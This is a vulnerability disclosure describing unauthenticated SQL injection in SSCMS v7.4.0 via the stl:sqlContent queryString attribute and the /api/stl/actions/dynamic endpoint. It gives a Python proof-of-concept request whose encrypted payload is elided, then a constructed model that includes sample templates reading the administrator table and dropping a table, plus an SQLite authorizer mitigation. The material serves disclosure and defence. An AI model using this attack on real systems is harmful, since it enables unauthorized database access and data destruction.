Vulnerability Conditions
SSCMS v7.4.0 + SQLite + administrator (security_key) privileges
Vulnerability Details
Code auditing revealed that, in the affected component, the queryString attribute of the stl:sqlContent tag is appended directly to the SQL query that gets executed, with no parameterization; whoever controls that attribute can therefore run arbitrary SQL.
The system's /api/stl/actions/dynamic interface accepts encrypted parameters without authentication, then decrypts and parses the STL template content they carry. Combined with the behaviour above, this lets an attacker who can produce a validly encrypted template execute arbitrary SQL statements.
Assuming we know the encryption key, I hardcoded the key in the Dockerfile during environment setup for easy vulnerability reproduction.
If the key is unknown, you need to log in as an administrator and manually encrypt the payload.
Then, the encrypted payload is concatenated and sent as a POST request. Successful execution returns the result of the SQL statement.
```python
import requests

# Encrypted STL template payload (value elided on this page)
encrypted = "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"
url = 'http://192.168.197.128:5000/api/stl/actions/dynamic'
# The endpoint decrypts the value and renders the template it contains
resp = requests.post(url, json={'value': encrypted, 'page': 1})
print('Status:', resp.status_code)
print('Response:', resp.text)
```
Database content was read successfully, and this was done in an unauthorized (unauthenticated) state.
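As an added illustration (not SSCMS code), the snippet below models the behaviour described above: a queryString attribute is pulled out of an stl:sqlContent tag and executed verbatim against SQLite, and an SQLite authorizer shows how template-supplied SQL can be confined to read-only access on an allow-list of tables. The table names, the allow-list and the regex-based tag extraction are assumptions.

```python
import re
import sqlite3

# Constructed stand-in for a template engine that runs the queryString attribute
# of <stl:sqlContent> as-is (the behaviour the advisory describes), plus an SQLite
# authorizer that limits such SQL to reads of allow-listed tables. Table names and
# the allow-list are assumptions, not SSCMS's real schema.
ALLOWED_TABLES = {"content"}
SQL_CONTENT_RE = re.compile(r'<stl:sqlContent\b[^>]*?\bqueryString="([^"]*)"', re.I)


def extract_query_strings(template: str) -> list:
    """Return every queryString attribute found in stl:sqlContent tags."""
    return SQL_CONTENT_RE.findall(template)


def _authorizer(action, arg1, arg2, db_name, trigger):
    """Allow SELECT statements that only read allow-listed tables; deny the rest."""
    if action == sqlite3.SQLITE_SELECT:
        return sqlite3.SQLITE_OK
    if action == sqlite3.SQLITE_READ and arg1 in ALLOWED_TABLES:
        return sqlite3.SQLITE_OK
    return sqlite3.SQLITE_DENY  # DROP, DELETE, PRAGMA, functions, other tables


def make_db() -> sqlite3.Connection:
    """In-memory database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE content(id INTEGER, title TEXT);"
        "INSERT INTO content VALUES (1, 'Hello'), (2, 'World');"
        "CREATE TABLE administrator(id INTEGER, username TEXT);"
        "INSERT INTO administrator VALUES (1, 'admin');"
    )
    return conn


def run_template_queries(conn, template: str, restricted: bool = True) -> list:
    """Execute each queryString verbatim; restricted=True installs the authorizer."""
    conn.set_authorizer(_authorizer if restricted else (lambda *_: sqlite3.SQLITE_OK))
    results = []
    for query in extract_query_strings(template):
        try:
            results.append(conn.execute(query).fetchall())
        except sqlite3.Error as exc:  # SQLite refuses the statement at prepare time
            results.append("denied: " + str(exc))
    return results


LEGIT_TEMPLATE = '<stl:sqlContent queryString="SELECT title FROM content ORDER BY id"></stl:sqlContent>'
OVERREACH_TEMPLATE = (
    '<stl:sqlContent queryString="SELECT username FROM administrator"></stl:sqlContent>'
    '<stl:sqlContent queryString="DROP TABLE content"></stl:sqlContent>'
)
```

With restricted=False the engine behaves like the vulnerable one and the second template reads the administrator table and drops content; with the authorizer installed both statements are refused while the legitimate content query still works.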